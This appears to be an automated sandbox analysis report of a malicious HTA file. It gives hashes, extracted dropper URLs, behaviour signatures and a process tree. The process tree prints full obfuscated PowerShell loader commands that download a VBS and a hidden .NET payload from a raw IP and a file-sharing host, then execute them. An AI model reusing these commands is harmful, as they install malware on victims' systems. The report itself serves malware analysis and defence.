Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-11-2024 14:24

General

  • Target

    ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669.hta

  • Size

    178KB

  • MD5

    5476ba599869d81abee08f38f1c1a1d9

  • SHA1

    46748779ec123145fdf90942c9df65d0099c9a99

  • SHA256

    ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669

  • SHA512

    516531534bee5995295659464f480c6d12909668fdb623c0c02dd93c9055df7bb203833e4e84416b31ef923dff8057f76f0e850bb84c53096cac43cdf2d04edd

  • SSDEEP

    96:4vCl172Xu01IhxXYcQu01IhPXYZxd7b2+sMdHeu01IhLu01Ih5XY4u01Iht5Q:4vCldarG1QrGsx92+KrGLrGZrGLQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\SysWOW64\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE
      "C:\Windows\sySTeM32\wIndOWSpoweRShEll\V1.0\POwERsHeLl.EXE" "pOWersHELl -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT ; invoke-eXPrEssIOn($(invOKE-eXPrEsSION('[sYStem.TEXt.ENcODiNg]'+[chAR]58+[ChAR]58+'UtF8.gETstrInG([sYstem.cONVErt]'+[cHAr]58+[ChAR]0x3a+'frOMBASE64STriNg('+[ChAr]34+'JHBmWHRRICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbUJlcmRlRmluSVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9OLkRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpUa1puTFpUZ1RCLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEZrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxEQyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFwT1l2aWhjLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5qUmNkQ2pXKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiT3JjWUR2USIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUEJvc0lTUiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkcGZYdFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMzL3NlZW15YmVzdHRoaW5nc3doaWNoY2FsbHlvdWJhYnlnaXJsd2hpY2hnaXZldWhvdGNoaWNrcy50SUYiLCIkRW5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2hpY2hjYWxseW91YmFieWdpcmx3aGljaGdpdmV1aC52YlMiLDAsMCk7U3RBUnQtU0xlRVAoMyk7SUVYICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGljaGNhbGx5b3ViYWJ5Z2lybHdoaWNoZ2l2ZXVoLnZiUyI='+[ChaR]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2688
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPass -Nop -W 1 -C DEVICecrEdEntialDEploymenT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2824
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qdohwy-b.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4B92.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC4B91.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:376
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2520
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aWVYICggKCgnM1pEaW1hZ2VVcmwgPSBJdWFodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBYV9iV285UmV1NDV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0R3JuVElDZkZobVQnKydLJysnajNMQzZTUXRJY09jX1QzNXcmcGtfdmlkPWZkNGY2MTQnKydiYjIwJysnOWM2MmMxNzMwJysnOTQ1MTc2YTA5MCcrJzRmIEl1JysnYTszWkR3ZWJDbCcrJ2llbnQgPSBOZXctT2JqZWN0IFN5cycrJ3RlbS5OJysnZXQuV2ViQ2xpZW50OzNaRGltYWdlQnl0ZXMgPSAzWkR3ZWJDbGllbnQuRG93bmxvYWREYXRhKDNaRGltYWdlVXJsKTszWkRpbWFnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkcnKydldFN0cmluZycrJygzWkRpbWFnZUJ5dGVzKTszWkRzdGFydEZsJysnYWcgPSBJdWE8PEJBU0U2NF9TVEFSVD4+SXVhOzNaRGVuZEZsYWcgPSBJdWE8PEJBU0U2NF9FTkQ+Pkl1JysnYTszWkRzdGFydEluZGV4ID0gM1pEaW1hZ2UnKydUZXh0LkluZGV4T2YoM1pEc3RhcnRGbGFnKTszWkRlbmRJbmRleCA9IDNaRGltYWdlVGV4dC5JbmRleE9mKDNaRGVuZEZsJysnYWcpOzNaRHN0YXJ0SW5kZXggLWdlIDAgLWFuZCAzWkRlbmRJbmRleCAtZ3QgM1pEc3RhcnRJbmRleDszWkRzdGFydEluZGV4ICs9IDNaRHN0YXJ0RmxhZy5MZW5ndGg7M1pEYmFzZTY0TGVuZ3RoID0gM1onKydEZW5kSW5kZXggLSAzWkRzdGFydEluZGV4JysnOzNaJysnRGJhc2U2JysnNENvbW1hbmQgPSAzWkRpbWFnZVRleHQuU3Vic3RyaW5nKDNaRHN0YXJ0SW5kZXgsIDNaRGInKydhc2U2NExlbmcnKyd0aCk7M1pEYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoM1pEYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHp3diBGb3JFYWNoLU9iamVjdCB7IDNaRF8gJysnfSlbLScrJzEuLi0oM1pEYmFzZTY0Q29tbWFuZC5MZW5ndCcrJ2gpXTszWkRjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKDNaRGJhc2U2NFJldmVyc2UnKydkKTszWkRsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGUnKydjdGlvbi5Bc3NlbWJseV06OkxvYWQoM1pEY29tbWFuZEJ5dGUnKydzKTszWkR2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZScrJ10uR2V0TWV0aG9kKEl1YVZBSUl1YSk7JysnM1pEdmFpTWV0aG9kLkludm9rZSgzWkRudWxsLCBAKEl1YXR4dC5LTEdPTC8zMy82MzEuMzQyLjMuMjkxLy86cCcrJ3R0aEl1YScrJywgSXVhZCcrJ2VzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdmFkb0l1YSwgSXVhZGVzYXRpdicrJ2Fkb0l1YSwgSXVhYXNwbmV0X2NvbXBpbGVySXVhLCBJdWFkZXNhdGknKyd2YWRvSXVhLCBJdWFkZXNhdGl2YWRvSXVhLEl1JysnYWRlc2F0aXZhZG9JdWEsSXVhZGVzYXRpdmFkb0l1YSxJdWFkZXNhdGl2YWRvSXUnKydhLEl1YWRlc2F0aXZhZG9JdScrJ2EsSXVhZGVzYXRpdmFkb0l1YSxJJysndWExSXVhLEl1YWRlc2F0aXZhZG9JdWEpJysnKTsnKSAgLUNSZXBsYWNlKFtDaEFyXTczK1tDaEFyXTExNytbQ2hBcl05NyksW0NoQXJdMzkgLUNSZXBsYWNlKFtDaEFyXTUxK1tDaEFyXTkwK1tDaEFyXTY4KSxbQ2hBcl0zNi1DUmVwbGFjZSAgKFtDaEFyXTEyMitbQ2hBcl0xMTkrW0NoQXJdMTE4KSxbQ2hBcl0xMjQpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2060
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "ieX ( (('3ZDimageUrl = Iuahttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmT'+'K'+'j3LC6SQtIcOc_T35w&pk_vid=fd4f614'+'bb20'+'9c62c1730'+'945176a090'+'4f Iu'+'a;3ZDwebCl'+'ient = New-Object Sys'+'tem.N'+'et.WebClient;3ZDimageBytes = 3ZDwebClient.DownloadData(3ZDimageUrl);3ZDimageText = [System.Text.Encoding]::UTF8.G'+'etString'+'(3ZDimageBytes);3ZDstartFl'+'ag = Iua<<BASE64_START>>Iua;3ZDendFlag = Iua<<BASE64_END>>Iu'+'a;3ZDstartIndex = 3ZDimage'+'Text.IndexOf(3ZDstartFlag);3ZDendIndex = 3ZDimageText.IndexOf(3ZDendFl'+'ag);3ZDstartIndex -ge 0 -and 3ZDendIndex -gt 3ZDstartIndex;3ZDstartIndex += 3ZDstartFlag.Length;3ZDbase64Length = 3Z'+'DendIndex - 3ZDstartIndex'+';3Z'+'Dbase6'+'4Command = 3ZDimageText.Substring(3ZDstartIndex, 3ZDb'+'ase64Leng'+'th);3ZDbase64Reversed = -join (3ZDbase64Command.ToCharArray() zwv ForEach-Object { 3ZD_ '+'})[-'+'1..-(3ZDbase64Command.Lengt'+'h)];3ZDcommandBytes = [System.Convert]::FromBase64String(3ZDbase64Reverse'+'d);3ZDloadedAssembly = [System.Refle'+'ction.Assembly]::Load(3ZDcommandByte'+'s);3ZDvaiMethod = [dnlib.IO.Home'+'].GetMethod(IuaVAIIua);'+'3ZDvaiMethod.Invoke(3ZDnull, @(Iuatxt.KLGOL/33/631.342.3.291//:p'+'tthIua'+', Iuad'+'esativadoIua, IuadesativadoIua, Iuadesativ'+'adoIua, Iuaaspnet_compilerIua, Iuadesati'+'vadoIua, IuadesativadoIua,Iu'+'adesativadoIua,IuadesativadoIua,IuadesativadoIu'+'a,IuadesativadoIu'+'a,IuadesativadoIua,I'+'ua1Iua,IuadesativadoIua)'+');') -CReplace([ChAr]73+[ChAr]117+[ChAr]97),[ChAr]39 -CReplace([ChAr]51+[ChAr]90+[ChAr]68),[ChAr]36-CReplace ([ChAr]122+[ChAr]119+[ChAr]118),[ChAr]124))"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2796

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES4B92.tmp

    Filesize

    1KB

    MD5

    3b74d16f253256dc8e01664b739300ea

    SHA1

    0c7e8184ffe2e53a9ccb9441973709dc8b61c3bd

    SHA256

    b37de756e30b4d98882a597a4969b0c4d5843b8878f2b855822aa29f0b54a1ca

    SHA512

    50766ebdc2a46df15bd4537b35803a9fef4fc57f7f1aae91298775143dec499ab725d359316bf7a4ba38d938c333da57a64c3da07b0f2e099a637a407bd07035

  • C:\Users\Admin\AppData\Local\Temp\qdohwy-b.dll

    Filesize

    3KB

    MD5

    aa5ef2f259a4f29c8f92985354e88602

    SHA1

    388a0617220d9329c8af08103c884bff55447ce1

    SHA256

    8cd44da097c9e1454006578f98eab5ccd49d4fe931cdbe32e01851e45cbbc341

    SHA512

    077b6497126a254a683ee21816aaf573827b78526a4b1add771699ae7fb3a198e79bfdbbbf3a016b28743f3232b1dece2d266efe71f28a584516ecf3bcf6b82f

  • C:\Users\Admin\AppData\Local\Temp\qdohwy-b.pdb

    Filesize

    7KB

    MD5

    bacd0c0a01269a7ce369e145b4901e81

    SHA1

    b42346091774085de5140db516ff8a04f1604e8b

    SHA256

    718c34dad5c37997955d409cefd5d674e9489412fede2c03f6354b0597441da1

    SHA512

    0aad57d9c4b90e8d48f490a132abda07d7f755d50011e0e8c6977195ff0855cba25b57297668bfbc4fcbea5c5f9b7f0447a3ea1a9139b7e1b230ed62cf8460b4

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    dd3249f2776a3810b924c248b141e7ca

    SHA1

    1e35405aeeb1bc23d4e8411abcea0ccd0bfdbd7f

    SHA256

    23e381d023c2e590fa269b72bdae5ae168998b9847c809137d189fa207a0835e

    SHA512

    9100d29bcd00183ac6a7d5ec7bf102b96582b60bbf99fe6808d4ecf949fadab4de7ced7c31535f31c51db5dbf05927c358cbe9feb7b3c16595e7955c5652c775

  • C:\Users\Admin\AppData\Roaming\seemybestthingswhichcallyoubabygirlwhichgiveuh.vbS

    Filesize

    140KB

    MD5

    7450b95ac8fa59e12e46a4c2a6cf36ed

    SHA1

    f1e5ec3acdd59283ccaf7611f572ccbbd4009b63

    SHA256

    12a0a30bf86b8a8eb35e4309a523faf7673c467dc623f3cfb09fcd45fc4fc139

    SHA512

    951b71eddd8c390e9bb37585f8865e7e7343a967a62321edd74b06d9474df3f0c8c5440a91e96d672d5369b181828c655f28d233f5e3a5fb6945c48ef808b754

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC4B91.tmp

    Filesize

    652B

    MD5

    56d62f7a6819a82b2c2bb847f9ef3593

    SHA1

    792057f70e1ab785ae206e878f416cd04db64dc6

    SHA256

    735bcf9808a8c4d97f42be85fc4ccab2184fdc8c9a9a89295aa43bc1ea5c8145

    SHA512

    443b21b1b64290878fe2a7875f0435ab63fd639103f82649a4c9f11fa8b0a191e8d3324381993426614269d2611388bfb17260db24732316ec4e9b4bd10f1bcd

  • \??\c:\Users\Admin\AppData\Local\Temp\qdohwy-b.0.cs

    Filesize

    484B

    MD5

    8fc8053789ede73b926da0b3d6b6ab73

    SHA1

    feb5351771dc5474c1e18579123e3a5320b12120

    SHA256

    da39f89715a7d00579cddd1c02ab586ed7b0c24618cb54555cd37a50d92dc9ab

    SHA512

    271ce0712b57e18229515700cc941d34534ce5b0f6209c086b3f71e93a32ae70882c537ac416b96d08b8c4cc25064c6870336a30b3512c1a932a4445b2468644

  • \??\c:\Users\Admin\AppData\Local\Temp\qdohwy-b.cmdline

    Filesize

    309B

    MD5

    cca25ee09ee7ee0fadc6ed297b2800bc

    SHA1

    ac50c73cd3beb61e4060277ff78e8a96e39b5025

    SHA256

    d58dbe580d4cf3f3130ee51dc6bbdb6ad4c18511eeb9772305ae0e22c6fad253

    SHA512

    0975b6ac7212df4ebeaca70c0be866d9b31415c9744dcb4c5770ff2035dae09fe50114d83e31f075c84b3cecd8e6593b7f38417600ef63ffa41492068998aa95